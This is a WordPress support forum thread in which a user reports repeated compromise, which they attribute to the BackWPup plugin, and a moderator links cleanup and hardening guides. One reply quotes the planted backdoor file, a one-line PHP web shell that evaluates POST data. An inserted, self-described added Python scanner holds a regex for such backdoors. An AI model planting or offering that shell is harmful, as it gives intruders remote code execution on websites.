Title: security problem
Last modified: August 21, 2016

---

# security problem

 *  [tounoki](https://wordpress.org/support/users/tounoki/)
 * (@tounoki)
 * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/)
 * Hi
    I think I had a security problem or vulnerability with BackWPup. Some files
   appeared, like an md5.php file in the root directory of my blog, or files with a common
   name that seems normal, like /images/index.html. The crack inserted a lot of web links
   to commercial websites into the theme in use. The same happened with the different themes
   I use. I have kept the inserted files, maybe the inserted links (I have to search
   for them again). I don’t know the exact vulnerability; my solution is to stop using
   the plugin :\ BR Nico
 * [http://wordpress.org/extend/plugins/backwpup/](http://wordpress.org/extend/plugins/backwpup/)

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Thread Starter [tounoki](https://wordpress.org/support/users/tounoki/)
 * (@tounoki)
 * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948932)
 * The version was: Stable tag: 3.0.11
    The content of md5.php was: `<?php @eval($_POST['omg']);?>` Nico
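A defensive check for the kind of file quoted above, as an added example that is not part of the original thread or the plugin's code: a Python scan that flags files where request data is passed straight into a code-execution function, tolerating the `@` prefix and the line break seen in md5.php. The function list, the size limit and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

MAX_BYTES = 2_000_000  # assumption: skip very large files (archives, media)

# Code-execution functions called directly on request data, as in the md5.php
# quoted above. PHP function names are case-insensitive, and whitespace or
# line breaks may separate the tokens, so the pattern tolerates both.
SINKS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
BACKDOOR_RE = re.compile(
    r"@?\b" + SINKS + r"\s*\(\s*(?:\w+\s*\(\s*)*" + SOURCES, re.IGNORECASE
)


def scan_tree(root):
    """Return sorted (relative_path, line_number, snippet) hits under root."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.stat().st_size > MAX_BYTES:
            continue
        # Check every file regardless of name: the thread reports planted
        # files with ordinary-looking names, not only *.php.
        text = path.read_text(encoding="utf-8", errors="replace")
        for m in BACKDOOR_RE.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            snippet = " ".join(m.group(0).split())
            hits.append((path.relative_to(root).as_posix(), line, snippet))
    return sorted(hits)


def demo():
    """Scan a constructed sample tree (not data from the thread's site)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content/themes/sample").mkdir(parents=True)
        (root / "md5.php").write_text("<?php @eval(\n   $_POST['omg']);?>\n")
        (root / "index.php").write_text("<?php\nrequire 'wp-blog-header.php';\n")
        (root / "wp-content/themes/sample/functions.php").write_text(
            "<?php\n$q = sanitize_text_field($_POST['q']);\n"
        )
        return scan_tree(root)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

A hit is a lead for manual review of that file; obfuscated backdoors will not match this pattern.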
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948940)
 * >  Some files appears like md5.php file in the root directory of my blog. Or 
   > with a common name that seems normal like /images/index.html.
 * I don’t know if you have an exploit with BackWPup but your site was compromised
   and needs to be deloused.
 * This is an often quoted response (I’m trying to avoid Copy/Pasta [it’s an inside
   joke]) but those links can really help you get a handle on your situation.
 * You need to start working your way through these resources:
    * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
    * [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
    * [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
    * [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Anything less will probably result in the hacker walking straight back into your
   site again.
 * Additional Resources:
    * [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
    * [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
    * [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/)
    * [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 * Give those a start and hopefully you can lock down and fix your installation.
 *  Thread Starter [tounoki](https://wordpress.org/support/users/tounoki/)
 * (@tounoki)
 * [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948955)
 * I have already fixed my installations (3 WP with the same problem on the same
   host). I made a lot of tests (for about several weeks, with the _scientific_ method ;o))
   and a vulnerability in BackWPup is my last conclusion (even if I can of course
   be wrong).
    Thanks for the links: I have done the entire list of the first link
   a few times (more than 5). Only when I didn’t upload the plugin again did the installation
   stay clean until today (it was more than 1 month ago – and attacks came
   between 3 and 7 days after the cleanup). Nico


The topic ‘security problem’ is closed to new replies.


 * 3 replies
 * 2 participants
 * Last reply from: [tounoki](https://wordpress.org/support/users/tounoki/)
 * Last activity: [12 years, 9 months ago](https://wordpress.org/support/topic/security-problem-12/#post-3948955)
 * Status: not resolved